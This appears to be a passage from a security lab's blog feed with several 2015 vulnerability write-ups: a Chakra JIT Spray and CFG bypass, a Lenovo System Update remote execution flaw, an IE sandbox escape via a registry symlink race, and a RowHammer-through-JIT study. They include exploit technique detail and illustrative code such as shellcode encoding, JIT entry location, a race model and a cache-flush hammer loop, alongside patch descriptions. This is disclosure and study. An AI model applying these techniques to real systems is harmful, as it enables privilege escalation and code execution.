To mitigate JIT Spray, Chakra allows the user to control at most 2 bytes of an immediate value. In this specific situation, however, the array index and the value being written appear in the same instruction, so we can control 4 bytes of data instead of 2.

The 2-byte shellcode discussed previously can also be used here. Because of the additional two 0x00 bytes (which are interpreted as “add byte ptr [eax], al”), we need to make eax point to a writable location in the first two instructions.
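The byte layout of that instruction can be reproduced with a small encoder. The sketch below only models the x86 encoding of `mov word ptr [esi+disp32], imm16` (prefix 66, opcode C7 /0, ModRM 86); EncodeMovWord is a name made up for this example, and the assumption that the element offset is index*2 follows from Uint16Array having 2-byte elements.

```cpp
#include <array>
#include <cassert>
#include <cstdint>

// Encode `mov word ptr [esi+disp32], imm16`:
//   66        operand-size prefix (16-bit operand)
//   C7 /0     mov r/m16, imm16
//   86        ModRM: mod=10 (disp32), reg=000, rm=110 (esi)
std::array<std::uint8_t, 9> EncodeMovWord(std::uint32_t disp, std::uint16_t imm) {
    return {0x66, 0xC7, 0x86,
            static_cast<std::uint8_t>(disp), static_cast<std::uint8_t>(disp >> 8),
            static_cast<std::uint8_t>(disp >> 16), static_cast<std::uint8_t>(disp >> 24),
            static_cast<std::uint8_t>(imm), static_cast<std::uint8_t>(imm >> 8)};
}

void DemoEncode() {
    // ar[0x9090/2] = 0x9090 on a Uint16Array: byte offset = index * 2.
    const std::uint32_t index = 0x9090u / 2u;
    const auto bytes = EncodeMovWord(index * 2u, 0x9090u);
    const std::array<std::uint8_t, 9> expected =
        {0x66, 0xC7, 0x86, 0x90, 0x90, 0x00, 0x00, 0x90, 0x90};
    assert(bytes == expected);  // matches 66c786909000009090 in the listing above
}
```

Bytes 3 to 4 come from the array index and bytes 7 to 8 from the stored value, so four bytes of the instruction are attacker-chosen, with the two zero bytes of the displacement in between.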

0x04 Using Chakra Engine to Bypass CFG

Using the methods discussed above, we can perform a JIT Spray to bypass DEP, but the shellcode entry point embedded in the JIT’d code obviously cannot pass the CFG check. However, the Chakra engine itself has implementation flaws that can be exploited to bypass CFG.

There is a fixed entry point function that is always generated, regardless of whether the currently executing JavaScript code needs JIT compilation:

0:017> uf 4ff0000
04ff0000 55          push  ebp
04ff0001 8bec        mov   ebp,esp
04ff0003 8b4508      mov   eax,dword ptr [ebp+8]
04ff0006 8b4014      mov   eax,dword ptr [eax+14h]
04ff0009 8b4840      mov   ecx,dword ptr [eax+40h]
04ff000c 8d4508      lea   eax,[ebp+8]
04ff000f 50          push  eax
04ff0010 b840cb5a71  mov   eax, 715acb40h ; jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>
04ff0015 ffe1        jmp   ecx

The address of this function can pass the CFG check. Moreover, there is no CFG check of the target address before jmp ecx, so the function can be used as a trampoline for jumping to an arbitrary address. We will call it “cfgJumper” hereafter.

0x05 Locating JIT Memory and cfgJumper

To use JIT Spray to bypass DEP and cfgJumper to bypass CFG, we need to locate both the JIT compiled code and the cfgJumper. Interestingly, the methods for locating them are almost identical.

Every JavaScript function has a corresponding Js::ScriptFunction object, and every Js::ScriptFunction object references a Js::FunctionBody object. Inside this Js::FunctionBody object, a function pointer to the actual function entry point is stored.

If a function has never been called, this function pointer points to Js::InterpreterStackFrame::DelayDynamicInterpreterThunk:

0:002> dc 0b89de70 l 8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@........... // Js::ScriptFunction
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> dc 0b8d0000 l 8
0b8d0000  6ff6c970 70181720 00000001 00000000  p..o ..p........ // Js::FunctionBody
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 70181720 l 1
Chakra!Js::InterpreterStackFrame::DelayDynamicInterpreterThunk:
70181720 55              push    ebp

If a function has been called before, but never compiled into JIT’d code, this function pointer points to cfgJumper:

0:002> dc 0b89de70 l 8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@...........
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> dc 0b8d0000 l 8
0b8d0000  6ff6c970 00860000 00000001 00000000  p..o............
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 00860000
00860000 55          push  ebp
00860001 8bec        mov   ebp,esp
00860003 8b4508      mov   eax,dword ptr [ebp+8]
00860006 8b4014      mov   eax,dword ptr [eax+14h]
00860009 8b4840      mov   ecx,dword ptr [eax+40h]
0086000c 8d4508      lea   eax,[ebp+8]
0086000f 50          push  eax
00860010 b800240870  mov   eax,70082400h ; Chakra!Js::InterpreterStackFrame::InterpreterThunk
00860015 ffe1        jmp   ecx

If a function is regularly called and Chakra compiles it into JIT’d code, this function pointer points to the actual code:

0:002> d 0b89de70 l8
0b89de70  6ff72808 0b89de40 00000000 00000000  .(.o@...........
0b89de80  70523168 0b8d0000 7041f35c 00000000  h1Rp....\.Ap....
0:002> d 0b8d0000 l8
0b8d0000  6ff6c970 00950000 00000001 00000000  p..o............
0b8d0010  0b8d0000 000001b8 072cc7e0 0b418ea0  ..........,...A.
0:002> u 00950000
00950000 55              push    ebp
00950001 8bec            mov     ebp,esp
00950003 81fc44c9120b    cmp     esp,0B12C944h
00950009 7f18            jg      00950023
0095000b 6a00            push    0
0095000d 6a00            push    0
0095000f 68e0c72c07      push    72CC7E0h
00950014 6844090000      push    944h

With an understanding of the internal structure of Js::ScriptFunction and Js::FunctionBody, we can precisely locate the JIT’d code and the cfgJumper.
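The pointer chase can be sketched as two dword reads. In the model below, memory is a plain map standing in for whatever read primitive the exploit has; the offsets 0x14 and 0x04 are inferred from the memory dumps above for this particular 32-bit build and should be treated as assumptions, as should the names Memory, ReadDword and EntryPointOf.

```cpp
#include <cassert>
#include <cstdint>
#include <map>

// address -> dword; a stand-in for an arbitrary memory read primitive.
using Memory = std::map<std::uint32_t, std::uint32_t>;

// Offsets inferred from the dumps above (assumptions for this build).
constexpr std::uint32_t kFunctionBodyOffset = 0x14;  // ScriptFunction -> FunctionBody*
constexpr std::uint32_t kEntryPointOffset = 0x04;    // FunctionBody -> entry point

std::uint32_t ReadDword(const Memory& mem, std::uint32_t addr) {
    return mem.at(addr);  // throws std::out_of_range for unmapped addresses
}

// Follow ScriptFunction -> FunctionBody -> entry point.
std::uint32_t EntryPointOf(const Memory& mem, std::uint32_t scriptFunction) {
    const std::uint32_t body = ReadDword(mem, scriptFunction + kFunctionBodyOffset);
    return ReadDword(mem, body + kEntryPointOffset);
}

void DemoLocate() {
    // Values copied from the third dump (function already JIT compiled).
    const Memory mem = {
        {0x0b89de84u, 0x0b8d0000u},  // ScriptFunction + 0x14 -> FunctionBody
        {0x0b8d0004u, 0x00950000u},  // FunctionBody + 0x04   -> JIT'd code
    };
    assert(EntryPointOf(mem, 0x0b89de70u) == 0x00950000u);
}
```

The same two reads return the cfgJumper address (00860000 in the second dump) when the function has been called but not yet compiled, which is why both locations can be found with one routine.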

0x06 Avoiding Randomly Inserted NOP instructions

Besides constant blinding, the Chakra engine also employs randomized NOP instruction insertion to mitigate JIT Spray, but the insertion density is rather low. The test code combines 29 16-bit numbers to form the shellcode. On Windows 10 only 29 x86 instructions are generated, with virtually no NOP instructions inserted in between. With the exploitation method used on Windows 8.1 and older operating systems, however, about 200 x86 instructions are generated, and these are highly likely to contain inserted NOP instructions.

To solve this problem:
1. Create a new script tag and put in a JavaScript function that contains the JIT shellcode.
2. Call this function in a loop to trigger JIT compilation.
3. Read the compiled code to determine whether any NOP instruction has been inserted.
4. If so, destroy the script tag and repeat this procedure.

The test environments were Windows 8.1 with all updates up to May 2015 and Windows 10 TP 9926.
Microsoft informed me that the issues were fixed in September 2015.

A “WormHole” vulnerability on PC http://xlab.tencent.com/en/2015/11/13/wormhole-on-pc/ Fri, 13 Nov 2015 08:15:52 +0000

The WormHole vulnerability that recently raised security concerns actually stems from a series of inappropriate development habits. Similar problems are very common on PC, but most of them are mitigated by Microsoft’s default firewall. I hope this post, coming amid a lot of discussion on WormHole, can help raise the security awareness of developers.

0x01 Background

The Lenovo ThinkVantage System Update is used to help a user download and install software, drivers and BIOS updates from its server, which significantly reduces the difficulty and workload for a user to update the system. This program is pre-installed on many Lenovo products.

Lenovo ThinkVantage System Update can download software and updates in several ways, depending on the network environment and configuration. One of them is downloading through file sharing, and the main program for this feature is UNCServer.exe. UNCServer.exe starts together with the main program of System Update and sets up a local server that waits for the main program to connect. In early versions, UNCServer.exe would remain active even after the main program of System Update exited.

0x02 Problem Description

In System Update 5.6.0.34, UNCServer.exe exposes multiple features over a TCP server channel using .NET Remoting.

.NET Remoting, which evolved from DCOM, is an older .NET distributed processing technology. It serializes objects and data on the server side and exports them. The client references the objects on the server across process boundaries via HTTP, TCP or IPC. However, the serialization mechanism of Remoting implicitly exports all methods and properties of an object. Once the client obtains a reference to an object exported by the server, it can call every method that the server object provides. The Remoting mechanism therefore easily introduces security vulnerabilities, and exposing a Remoting endpoint to untrusted clients is not recommended.

The Connector object exported by UNCServer provides functions including Connect, DownloadBean, IsFileExist, IsFolderExist, GetFilesInFolder, GetSubFolder, QueryFile and LaunchIE. A client can connect, obtain a reference to the object, and perform operations such as file downloading or program installation.
Among them, LaunchIE does not verify its parameter, so it can be used to start an arbitrary process. The actual code is as follows:

case UNCAction.LaunchIE:
        string fileName = (string) eventObj;
        try{
            Process.Start(fileName);
        }
        catch{
        }
        this.connector.Current = (object) true;
    break;

Meanwhile, although System Update only adds outbound rules to the firewall policy, UNCServer binds to 0.0.0.0:20050 because the necessary configuration is missing. Therefore, when there is no firewall protection, any machine can connect to it and use the DownloadBean and LaunchIE functions to download and execute programs remotely.

UNCServer creates the server channel and exports the object with the following code:

IDictionary properties = (IDictionary) new Hashtable();
properties[(object) "name"] = (object) "tvsuuncchannel";
properties[(object) "priority"] = (object) 2;
properties[(object) "port"] = (object) 20050;
this.channel = new TcpServerChannel(properties, (IServerChannelSinkProvider) new BinaryServerFormatterSinkProvider());
ChannelServices.RegisterChannel((IChannel) this.channel, false);
this.status = new object();
this.connector = new Connector();
RemotingServices.Marshal((MarshalByRefObject) this.connector, "Connector");
this.connector.UNCEvent += new Connector.UNCEventHandler(this.connector_UNCEvent);

0x03 Mitigation

Lenovo released System Update 5.7.0.13 on September 29th, 2015, which fixes a number of vulnerabilities including the one discussed here. It reimplements the LaunchIE and LaunchHelp functions and verifies the parameter used to create the process. It also improves the server configuration by binding to 127.0.0.1:20050 in order to block remote access.

The following is part of the fixed code:

case UNCAction.LaunchIE:
        try{
            string str = (string) eventObj;
            Uri result;
            if (Uri.TryCreate(str, UriKind.Absolute, out result) && (result.Scheme == Uri.UriSchemeHttp || result.Scheme == Uri.UriSchemeHttps))
                Process.Start(str);
        }
        catch{
        }
        this.connector.Current = (object) true;
    break;        


IDictionary properties = (IDictionary) new Hashtable();
properties[(object) "name"] = (object) "tvsuuncchannel";
properties[(object) "priority"] = (object) 2;
properties[(object) "port"] = (object) 20050;
properties[(object) "rejectRemoteRequests"] = (object) true;
properties[(object) "bindTo"] = (object) "127.0.0.1";
this.channel = new TcpServerChannel(properties, (IServerChannelSinkProvider) new BinaryServerFormatterSinkProvider());
ChannelServices.RegisterChannel((IChannel) this.channel, false);
this.status = new object();
this.connector = new Connector();
RemotingServices.Marshal((MarshalByRefObject) this.connector, "Connector");
this.connector.UNCEvent += new Connector.UNCEventHandler(this.connector_UNCEvent);
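The effect of the scheme check in the fixed LaunchIE handler can be approximated in portable C++. This is only a sketch of the allow-list idea: SchemeOf and IsLaunchable are hypothetical helpers, and the scheme parsing follows the RFC 3986 grammar rather than reproducing everything that Uri.TryCreate validates in .NET.

```cpp
#include <cassert>
#include <cctype>
#include <string>

// Return the lower-cased scheme of an absolute URI, or "" if there is none.
// Grammar (RFC 3986): scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." ) ":"
std::string SchemeOf(const std::string& s) {
    const std::size_t colon = s.find(':');
    if (colon == std::string::npos || colon == 0) return "";
    if (!std::isalpha(static_cast<unsigned char>(s[0]))) return "";
    std::string scheme;
    for (std::size_t i = 0; i < colon; ++i) {
        const unsigned char c = static_cast<unsigned char>(s[i]);
        if (!std::isalnum(c) && c != '+' && c != '-' && c != '.') return "";
        scheme.push_back(static_cast<char>(std::tolower(c)));
    }
    return scheme;
}

// Allow-list used before handing the string to the process launcher.
bool IsLaunchable(const std::string& s) {
    const std::string scheme = SchemeOf(s);
    return scheme == "http" || scheme == "https";
}

void DemoAllowList() {
    assert(IsLaunchable("http://example.com/"));
    assert(IsLaunchable("HTTPS://example.com/help"));
    assert(!IsLaunchable("calc.exe"));                 // no scheme at all
    assert(!IsLaunchable("C:\\Windows\\System32\\calc.exe"));  // parsed as scheme "c"
    assert(!IsLaunchable("file:///C:/Windows/System32/calc.exe"));
}
```

With such a check in place, the parameter that previously reached Process.Start unfiltered can only name a web URL, so a remote caller can no longer pass the path of an executable.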

0x04 Summary

Remoting is a previous generation of .NET distributed processing technology, which has been superseded by Microsoft’s WCF because of security defects in its design. Applications that still use Remoting for distributed processing or communication should take note of these potential security issues, as any mishandling may introduce security flaws.

Translated by WooYun Drops
Poking a Hole in the Patch–Escaping from IE Sandbox with a Poorly Patched Vulnerability http://xlab.tencent.com/en/2015/08/27/poking-a-hole-in-the-patch/ Thu, 27 Aug 2015 11:17:55 +0000

James Forshaw reported a vulnerability in the Windows Audio Service to Microsoft in November 2014. In our analysis, we discovered that the patch Microsoft released later did not completely solve the problem. With a combination of techniques, we successfully bypassed the patch and were able to exploit the vulnerability on a patched system.

0x00 The Problem

There was a privilege escalation vulnerability in Windows Audio Service, reported by James Forshaw in November 2014.

The Windows Audio Service, which manages the audio sessions of all processes running in the system, stores audio session configurations under the registry key HKCU\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig.

So that this configuration can be modified even by low privileged processes, the service recursively sets the ACLs of the sub keys to give write access to Low IL processes.

If an attacker places a symbolic link under this key and points it to a higher-privileged location, the Windows Audio Service makes that location controllable by Low IL.

0x01 The Patch

Microsoft released security bulletin MS14-071, followed by patch KB3005607, to fix this vulnerability.
This patch added two functions, SafeRegCreateKeyEx and DetectRegistryLink.

The following is the reconstructed DetectRegistryLink function:

int DetectRegistryLink(const HKEY key_handle, const wchar_t sub_key_path[], HKEY * out_handle)
{
    int detect_result = 0;
    HKEY sub_key_handle;
    LSTATUS status = RegOpenKeyExW(key_handle,
                                   sub_key_path,
                                   REG_OPTION_OPEN_LINK,
                                   KEY_ALL_ACCESS,
                                   &sub_key_handle);

    if (status != ERROR_SUCCESS) {
        if (status == ERROR_FILE_NOT_FOUND) {
            detect_result = 3;
        } else if (status == ERROR_ACCESS_DENIED) {
            detect_result = 4;
        } else {
            detect_result = 5;
        }
    } else {
        DWORD key_type;
        BYTE data[MAX_PATH * 2];
        DWORD data_size = sizeof(data);

        status = RegQueryValueExW(sub_key_handle, 
                                  kSymbolicLinkValueName, 
                                  nullptr,
                                  &key_type, 
                                  data, 
                                  &data_size);

        if (((status == ERROR_SUCCESS) || (status == ERROR_MORE_DATA)) && (key_type == REG_LINK)) {
            detect_result = 1;
        } 
        if ((status == ERROR_FILE_NOT_FOUND) && (detect_result != 1)) {
            HKEY temp_key_handle;
            status = RegOpenKeyExW(key_handle,
                                   sub_key_path,
                                   0,
                                   KEY_READ,
                                   &temp_key_handle);

            RegCloseKey(temp_key_handle);
            detect_result = (status == ERROR_SUCCESS) + 1;
        }

        *out_handle = sub_key_handle;
    }

    return detect_result;
}

DetectRegistryLink performs strict checks on symbolic links. It first opens the key with the REG_OPTION_OPEN_LINK flag, which prevents redirection, then checks for many different cases, including redirection to non-existing keys. After all the checks have been performed, the key handle is passed out of the function for reuse.

The upper level function SafeRegCreateKeyEx uses DetectRegistryLink to check the key for symbolic links before creating a new sub key, uses NtDeleteKey to delete the symbolic link (with the previously opened handle) if one is found, and finally uses RegCreateKeyEx to create a new, “safe to use” sub key.

HKEY sub_key_handle;
int detect_result = DetectRegistryLink(key_handle, kSubKeyPath, &sub_key_handle);

if (detect_result == 1) {
    status = NtDeleteKey(sub_key_handle);
    RegCloseKey(sub_key_handle);
    sub_key_handle = nullptr;

    if (!NT_SUCCESS(status)) {
        return ERROR_ACCESS_DENIED;
    }
}

if (detect_result > 3) {
    if (sub_key_handle) {
        RegCloseKey(sub_key_handle);
    }

    return ERROR_ACCESS_DENIED;
}

DWORD create_disposition = 0;

if (sub_key_handle) {
    create_disposition = REG_OPENED_EXISTING_KEY;
} else {
    status = RegCreateKeyExW(key_handle,
                             kSubKeyPath,
                             0,
                             nullptr,
                             0,
                             KEY_ALL_ACCESS,
                             nullptr,
                             &sub_key_handle,
                             &create_disposition);

    if (status != ERROR_SUCCESS) {
        return status;
    }

    if (create_disposition != REG_CREATED_NEW_KEY) {
        RegCloseKey(sub_key_handle);
        return ERROR_ACCESS_DENIED;
    }
}

0x02 The Flaw

There is a serious flaw hidden inside this seemingly strict logic.

After NtDeleteKey deletes the symbolic link, the operating system no longer allows any further operation on that key. The already opened handles remain valid, but any operation other than closing the key fails with STATUS_KEY_DELETED.

After the key handle is closed, the remaining operations must create a new key with a new handle. In this situation, the object with the same name is not guaranteed to be the same object.

With a precisely timed attack, we can create a new symbolic link just before the RegCreateKeyEx call, bypassing the symbolic link check.
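The window between the delete and the create can be illustrated with a toy model. The sketch below replaces the registry with an in-memory map and represents everything other processes might do in that window by a callback; Key, Registry, SafeCreateModel and the key paths are all hypothetical and only mirror the order of operations in the reconstructed code, not the real API behaviour in full.

```cpp
#include <cassert>
#include <functional>
#include <map>
#include <string>

// Toy registry: a key is either an ordinary key or a symbolic link to `target`.
struct Key {
    bool isLink = false;
    std::string target;
};
using Registry = std::map<std::string, Key>;

// Mirrors the patched sequence: detect a link, delete it, then create by name.
// Returns the path of the key that ends up being used, or "" if rejected.
std::string SafeCreateModel(Registry& reg, const std::string& path,
                            const std::function<void(Registry&)>& raceWindow) {
    auto it = reg.find(path);
    if (it != reg.end()) {
        if (!it->second.isLink) return path;  // ordinary key: reuse the opened handle
        reg.erase(it);                        // link detected: NtDeleteKey
    }
    raceWindow(reg);                          // other processes may run here
    // The create call resolves the name again and follows any link now present.
    std::string resolved = path;
    it = reg.find(path);
    if (it != reg.end() && it->second.isLink) resolved = it->second.target;
    if (reg.count(resolved) != 0) return "";  // would not be REG_CREATED_NEW_KEY
    reg[resolved] = Key{};                    // new key at the resolved location
    return resolved;
}

void DemoRace() {
    const std::string path = "PolicyConfig\\Sub";               // hypothetical names
    const std::string target = "ElevationPolicy\\{new-guid}";

    // No interference: the planted link is removed and a fresh key is created.
    Registry quiet{{path, Key{true, "Protected\\Key"}}};
    assert(SafeCreateModel(quiet, path, [](Registry&) {}) == path);

    // Attacker re-plants a link inside the window: the create follows it.
    Registry raced{{path, Key{true, "Protected\\Key"}}};
    auto attacker = [&](Registry& r) { r[path] = Key{true, target}; };
    assert(SafeCreateModel(raced, path, attacker) == target);
}
```

In the second scenario the check has already passed when the new link appears, so the key that subsequently receives the permissive ACL is the attacker-chosen target rather than the sub key under PolicyConfig.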

0x03 The Exploit

We take IE 11 sandbox as an example to demonstrate how to escalate privilege with this vulnerability.

To exploit this vulnerability, we first need to make Windows Audio Service perform the delete operation.

We can purposely place a symbolic link under the HKCU\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig registry key, and trigger Windows Audio Service to save its configuration.

It is vital to control the timing of the second symbolic link placement. Of course we could create millions of threads trying to win the race, but the operating system already provides us with a handy mechanism.

NtNotifyChangeKey can watch a specific registry key and signal an event when certain operations are performed on that key.

By setting a notification on our first symbolic link, we are notified right after it is deleted by the Windows Audio Service, and have a chance to create a second symbolic link just before the Windows Audio Service calls RegCreateKeyEx.

We can then point the symbolic link to a non-existing GUID under HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy to satisfy the REG_CREATED_NEW_KEY requirement. The target key will be created by Windows Audio Service.

Finally, Windows Audio Service will overwrite the target key’s ACL with the ACL of the upper-level key (PolicyConfig), making the target key controllable by Low IL processes.

At this point the exploitation is successful. We can now write an arbitrary AppPath and set Policy to 0x3 to escape from the sandbox.
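
The sequence above can be modelled in a few lines. The following is a toy in-memory sketch, not Windows code: ToyKey, ToyRegistry, service_save and run_model are hypothetical names, the key paths are abbreviated, and the on_delete callback only stands in for the notification obtained through NtNotifyChangeKey. It assumes the service checks for a link, deletes it, re-creates the key by name, and copies the parent ACL onto whatever key was newly created.

```cpp
#include <cassert>
#include <functional>
#include <map>
#include <string>

// Toy model only; none of these types correspond to real Windows APIs.
struct ToyKey {
    bool is_symlink;
    std::string target;  // only meaningful when is_symlink is true
    std::string acl;
};

struct ToyRegistry {
    std::map<std::string, ToyKey> keys;
    // Stands in for a change notification: called right after a key is deleted.
    std::function<void(ToyRegistry&, const std::string&)> on_delete;

    void remove(const std::string& name) {
        keys.erase(name);
        if (on_delete) on_delete(*this, name);
    }

    // Creates `name`, following one level of symbolic link.
    // Returns the path actually created, or "" if that key already existed.
    std::string create_following_links(const std::string& name) {
        std::string path = name;
        auto it = keys.find(path);
        if (it != keys.end() && it->second.is_symlink) path = it->second.target;
        if (keys.count(path) != 0) return "";
        keys[path] = ToyKey{};
        return path;
    }
};

// Flawed sequence: check for a link, delete it, then re-create the key by name.
// Returns the path whose ACL was overwritten, or "" if nothing was written.
std::string service_save(ToyRegistry& reg, const std::string& name,
                         const std::string& parent_acl) {
    assert(!name.empty());
    auto it = reg.keys.find(name);
    if (it != reg.keys.end() && it->second.is_symlink) {
        reg.remove(name);  // the attacker's callback runs inside this call
    }
    const std::string created = reg.create_following_links(name);
    if (!created.empty()) reg.keys[created].acl = parent_acl;
    return created;
}

// Plays both roles and returns the key that ended up with the parent ACL.
std::string run_model() {
    ToyRegistry reg;
    const std::string link = "LowRegistry/Audio/PolicyConfig/x";
    const std::string target = "Low Rights/ElevationPolicy/{new-guid}";
    reg.keys[link] = ToyKey{true, "anywhere", ""};  // first symbolic link
    reg.on_delete = [&](ToyRegistry& r, const std::string& deleted) {
        // Second symbolic link, planted between the delete and the create.
        if (deleted == link) r.keys[link] = ToyKey{true, target, ""};
    };
    return service_save(reg, link, "low-il-writable");
}
```

In this model run_model() returns the ElevationPolicy path, because the second link is already in place when the key is re-created by name. A check that only inspects the first object cannot prevent this.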

0x04 The Trick

The registry operation performed by the Windows Audio Service is done after RpcImpersonateClient. Although the race can be won inside the IE sandbox, the registry operation will be performed with the originating process’ token, which does not have sufficient privileges.

James Forshaw did not solve this problem in his original PoC; the registry operation has to be triggered by manually starting SndVol.exe.

To solve it we have to find a Medium or higher IL process that uses an audio session (basically anything that emits sound) and can be triggered repeatedly to allow multiple retries.

IE Elevation Policy is preloaded with some system applications that can be started inside the sandbox with Medium IL, including Notepad.exe. After the Medium IL process is started, the returned handle only has the right to terminate the process. But we can still pass command line parameters.

When Notepad opens a non-existing file, it displays a dialog asking whether the user would like to create that file. The dialog is accompanied by a default system sound. This is sufficient to trigger a registry write by Windows Audio Service.

With multiple retries we can ensure successful exploitation.

0x05 The Mitigation

Microsoft completely disabled the creation of registry symbolic links at Low IL in a patch released in August 2015. When a registry symbolic link is set, the kernel uses RtlIsSandboxedToken to check the current process’ token, and returns STATUS_ACCESS_DENIED for any Low IL or AppContainer token. This renders any registry symbolic link based exploit unusable at Low IL, and effectively eliminates the possibility of exploiting this vulnerability inside the IE sandbox.

References

  1. Issue 99: IE11 AudioSrv RegistryKey EPM Privilege Escalation – James Forshaw
    https://code.google.com/p/google-security-research/issues/detail?id=99
  2. Vulnerability in Windows Audio Service Could Allow Elevation of Privilege (3005607)
    https://technet.microsoft.com/library/security/MS14-071
  3. Windows 10 Symbolic Link Mitigations – James Forshaw
    https://googleprojectzero.blogspot.com/2015/08/windows-10hh-symbolic-link-mitigations.html
]]>
Research report on using JIT to trigger RowHammer http://xlab.tencent.com/en/2015/06/09/research-report-on-using-jit-to-trigger-rowhammer/ Tue, 09 Jun 2015 02:42:27 +0000 http://xlab.tencent.com/en/?p=72 Continue reading "Research report on using JIT to trigger RowHammer"]]> RowHammer is a problem with some DDR3 memory in which repeatedly accessing a row can cause bit flips in adjacent rows. However, triggering it requires running customized assembly code on the target machine, so RowHammer is not easy to use in an attack. Our idea was to trigger RowHammer from a script language. If that works, RowHammer becomes more dangerous. To verify the idea, we analyzed Java Hotspot, Chrome V8, .NET CoreCLR and Firefox SpiderMonkey.

0x00 Overview

  In a post published on the Google Project Zero blog, researchers explain that the RowHammer technique works by repeatedly accessing memory rows in DRAM to flip bits in adjacent rows. People worry about it because fixing it requires a BIOS update, which makes the problem hard to solve. However, triggering RowHammer requires running customized assembly code on the target machine, so it is not easy to use in an attack.
  Our idea was to use a script language to trigger RowHammer. If that works, RowHammer becomes more dangerous. To verify the idea, we analyzed Java Hotspot, Chrome V8, .NET CoreCLR and Firefox SpiderMonkey.
  In the end we did not find a useful attack vector. Some of the engines do not generate the instructions needed to trigger RowHammer; some generate them too rarely and too slowly to trigger it; and some need a modified environment, so we cannot use them to attack directly.

0x01 RowHammer

  In this section, we briefly review the root cause of RowHammer, how to trigger it, and the limitations we face when trying to use it in an attack.

1.1 What’s RowHammer?

  RowHammer is a problem with some DDR3 memory in which repeatedly accessing a row can cause bit flips in adjacent rows. As shown in Figure 1.1(a), DRAM comprises a two-dimensional array of DRAM cells. As shown in Figure 1.1(b), one cell consists of a capacitor and an access-transistor. The access-transistor connects to the wordline and the capacitor stores the data. The data in a row is accessible only while its wordline is at high voltage, at which point the data in the row is transferred to the row-buffer. When a wordline’s voltage is toggled on and off repeatedly, some cells in nearby rows leak charge. If such a cell cannot retain its charge for 64ms, the interval between refreshes, its data is lost.

  Figure 1.2 shows a 2GB rank, whose 256K rows are vertically partitioned into eight banks of 32K rows, where each row is 8KB (64Kb). Each bank has its own dedicated row-buffer. Notice that alternating between rows in different banks cannot trigger RowHammer.

Figure 1.1


Figure 1.2
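
The geometry of the 2GB rank described above can be checked with a little arithmetic. The sketch below is illustrative only: the names are hypothetical, and the offset-to-bank mapping in locate() is an assumption made for the example (real memory controllers use their own, often undocumented, mappings). It shows the numbers adding up to 2GB and the condition two addresses must meet to share a bank but not a row.

```cpp
#include <cassert>
#include <cstdint>

// Figures taken from the text: 8KB rows, 32K rows per bank, 8 banks.
constexpr std::uint64_t kRowBytes = 8 * 1024;
constexpr std::uint64_t kRowsPerBank = 32 * 1024;
constexpr std::uint64_t kBanks = 8;

constexpr std::uint64_t rank_rows() { return kRowsPerBank * kBanks; }
constexpr std::uint64_t rank_bytes() { return kRowBytes * rank_rows(); }

struct DramLocation {
    std::uint64_t bank;
    std::uint64_t row;
};

// ASSUMED mapping for illustration: consecutive 8KB chunks rotate across banks.
DramLocation locate(std::uint64_t offset) {
    assert(offset < rank_bytes());
    const std::uint64_t chunk = offset / kRowBytes;
    return DramLocation{chunk % kBanks, chunk / kBanks};
}

// True when alternating accesses to x and y would keep re-opening rows
// in a single bank: same bank, different rows.
bool same_bank_different_row(std::uint64_t x, std::uint64_t y) {
    const DramLocation a = locate(x);
    const DramLocation b = locate(y);
    return a.bank == b.bank && a.row != b.row;
}
```

Under this assumed mapping, offsets 0 and 64KB land in bank 0 on rows 0 and 1, while offsets 0 and 8KB land in different banks and therefore use different row-buffers.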

1.2 Trigger RowHammer

  Google Project Zero gives a snippet of code that can cause RowHammer. It repeatedly reads two addresses, X and Y, and flushes both from the cache.

  The addresses of X and Y are very important if you want to trigger RowHammer. X and Y must point to the same bank but to different rows: each bank has its own row-buffer, so if both accesses hit the same row, the wordline does not toggle on and off repeatedly.

  This snippet of code can trigger RowHammer, but it is not the only one we can use. Any code that can toggle the wordline can be used to trigger RowHammer.
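
  The original snippet is not reproduced in this text. As a rough sketch in the same spirit, the loop below reads two addresses and flushes them from the cache on every iteration, using the _mm_clflush intrinsic where SSE2 is available. The function names are hypothetical, and choosing x and y so that they fall in the same bank but different rows is left to the caller.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

#if defined(__SSE2__) || defined(_M_X64)
#include <emmintrin.h>  // _mm_clflush
static inline void flush_line(const void* p) { _mm_clflush(p); }
#else
// Fallback so the sketch still compiles elsewhere; it flushes nothing.
static inline void flush_line(const void*) {}
#endif

// Reads *x and *y, then evicts both cache lines, `iterations` times.
// Returns the sum of the values read so the loads cannot be optimized away.
std::uint64_t hammer_pair(const std::uint32_t* x, const std::uint32_t* y,
                          std::size_t iterations) {
    assert(x != nullptr && y != nullptr);
    const volatile std::uint32_t* vx = x;  // volatile forces a real load
    const volatile std::uint32_t* vy = y;
    std::uint64_t sum = 0;
    for (std::size_t i = 0; i < iterations; ++i) {
        sum += *vx;     // read from address X
        sum += *vy;     // read from address Y
        flush_line(x);  // flush X so the next read goes to DRAM
        flush_line(y);  // flush Y so the next read goes to DRAM
    }
    return sum;
}
```

  Calling this on two ordinary stack variables only exercises the loop; it does not hammer anything, because the two addresses then share a row.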

1.3 Instruction needed

  In order to toggle the wordline on and off repeatedly, we have to deal with the CPU cache. If the address we want to access is already in the cache, the wordline will not be set to high voltage.

Instruction  Action
CLFLUSH      Flush the address from the cache
PREFETCH     Prefetch the data into the cache
MOVNT*       Non-temporal memory access

  The instructions above can be used to access an address while bypassing the cache. Using these instructions we can toggle the wordline and trigger RowHammer.

0x02 Using Script to trigger RowHammer

  The POC that Google Project Zero provides uses assembly code, and it can be used to verify whether your devices are vulnerable. We know that most script languages have a JIT compiler. If a script can steer the JIT compiler into triggering RowHammer, things get much worse. We studied Java Hotspot, Chrome V8, .NET CoreCLR and Firefox SpiderMonkey to verify the feasibility of our idea.

2.1 Java Hotspot

